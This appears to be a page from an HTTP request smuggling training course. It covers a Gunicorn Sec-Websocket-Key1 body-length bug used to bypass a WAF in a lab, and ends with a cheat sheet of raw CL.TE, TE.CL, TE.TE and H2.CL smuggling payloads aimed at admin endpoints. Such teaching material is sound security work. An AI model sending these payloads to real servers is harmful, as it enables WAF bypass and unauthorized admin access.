HTTP Attacks

Vulnerable Software

So far we have seen request smuggling vulnerabilities that arise from improper parsing or a lack of support for the TE header. However, web servers or reverse proxies can also be vulnerable to request smuggling due to other bugs that cause the length of a request to be parsed incorrectly.

Identification

In our lab, we will exploit a vulnerability in the Python Gunicorn web server that was detailed in this blog post. Gunicorn 20.0.4 contained a bug when encountering the HTTP header Sec-Websocket-Key1 that fixed the request body to a length of 8 bytes, no matter what value the CL and TE headers are set to. This is a special header used in the establishment of WebSocket connections. Since the reverse proxy does not suffer from this bug, this allows us to create desynchronization between the two systems.

To confirm the vulnerability, let's create a tab group in Burp Repeater with the following two requests:

GET / HTTP/1.1
Host: gunicorn.htb
Content-Length: 49
Sec-Websocket-Key1: x

xxxxxxxxGET /404 HTTP/1.1
Host: gunicorn.htb

and

GET / HTTP/1.1
Host: gunicorn.htb

When we send the tab group via a single TCP connection, we can observe the following behavior. The first response contains the index of the website as we would expect:

However, while the second request also contains the path /, the response is a 404 status code:

To understand what happened here, we can again look at the TCP stream. Just like in the previous sections, we will look at it from the reverse proxy first:

GET / HTTP/1.1
Host: gunicorn.htb
Content-Length: 49
Sec-Websocket-Key1: x

xxxxxxxxGET /404 HTTP/1.1
Host: gunicorn.htb

GET / HTTP/1.1
Host: gunicorn.htb

The reverse proxy parses the requests exactly how we would expect it. The first request is a GET request to / that has a body length of 49 bytes according to the CL header. After that, there is a second GET request to / with an empty request body. Now let's look at the TCP stream from the Gunicorn server's perspective:

GET / HTTP/1.1
Host: gunicorn.htb
Content-Length: 49
Sec-Websocket-Key1: x

xxxxxxxxGET /404 HTTP/1.1
Host: gunicorn.htb

GET / HTTP/1.1
Host: gunicorn.htb

Due to the bug in Gunicorn, the web server assumes a body length of 8 bytes as soon as it parses the Sec-Websocket-Key1 HTTP header even though the CL header specifies a different body length. Therefore, the first request's body contains only xxxxxxxx. Afterward, the web server sees a second GET request to /404 to which it responds with the 404 response we can observe in Burp. Lastly, the web server parses our second GET request to / as a third request. We could also hide this request in the body of the request to /404 by specifying a CL header here. But that is unnecessary in this scenario.

Exploitation

Just like in the previous section, our goal is to access the admin panel by bypassing the WAF that rejects all requests containing admin in the query string. We can do this by hiding the request to the admin panel from the WAF in our first request such that the WAF never parses it as an HTTP request's query string. The exploitation is thus similar to the exploit we showcased in the last section.

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Target: Click here to spawn the target system!

+ 5 Try to use what you learned in this section to exploit request smuggling to bypass the WAF and access the admin portal.

+10 Streak pts

Previous Next

Go to Questions

Introduction to HTTP Attacks

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

CRLF Injection

Description	Character	ASCII (Decimal)	ASCII (Hex)	URL Encoded
Carriage Return	`\r`	`13`	`0x0D`	`%0D`
Line Feed	`\n`	`10`	`0x0A`	`%0A`

Request Smuggling

Content-Length

request body length specified in the Content-Length header

POST / HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

param1=HelloWorld&param2=Test

Chunked Encoding

Transfer-Encoding header set to chunked to specify chunked encoding
Each chunk contains the chunk length in hex followed by a newline and the chunk data
Request terminated with empty chunk 0

POST / HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

1d
param1=HelloWorld&param2=Test
0

CL.TE Vulnerability

reverse proxy uses the Content-Length header, web server uses the Transfer-Encoding header

POST / HTTP/1.1
Host: clte.htb
Content-Length: 52
Transfer-Encoding: chunked

0

POST /admin.php?promote_uid=2 HTTP/1.1
Dummy:

TE.CL Vulnerability

reverse proxy uses the Transfer-Encoding header, web server uses the Content-Length header

GET /404 HTTP/1.1
Host: tecl.htb
Content-Length: 4
Transfer-Encoding: chunked

27
GET /admin HTTP/1.1
Host: tecl.htb


0

TE.TE Vulnerability

obfuscate Transfer-Encoding header from one of the systems to provoke a CL.TE or TE.CL vulnerability

Description	Header
Substring match	`Transfer-Encoding: testchunked`
Space in Header name	`Transfer-Encoding : chunked`
Horizontal Tab Separator	`Transfer-Encoding:[\x09]chunked`
Vertical Tab Separator	`Transfer-Encoding:[\x0b]chunked`
Leading space	`Transfer-Encoding: chunked`

HTTP/2 Downgrading

HTTP/2 is a binary protocol
HTTP/2 uses pseudo-headers:
- :method: the HTTP method
- :scheme: the protocol scheme (typically http or https)
- :authority: similar to the HTTP Host header
- :path: the requested path including the query string
HTTP/2 downgrading occurs when the reverse proxy rewrites an HTTP/2 request from the client to an HTTP/1.1 request which is forwarded to the web server

H2.CL vulnerability

Injection of a Content-Length header which is used by the web server after the request was rewritten by the reverse proxy

POST /index.php HTTP/2
Host: http2.htb
Content-Length: 0

POST /index.php?reveal_flag=1 HTTP/1.1
Foo: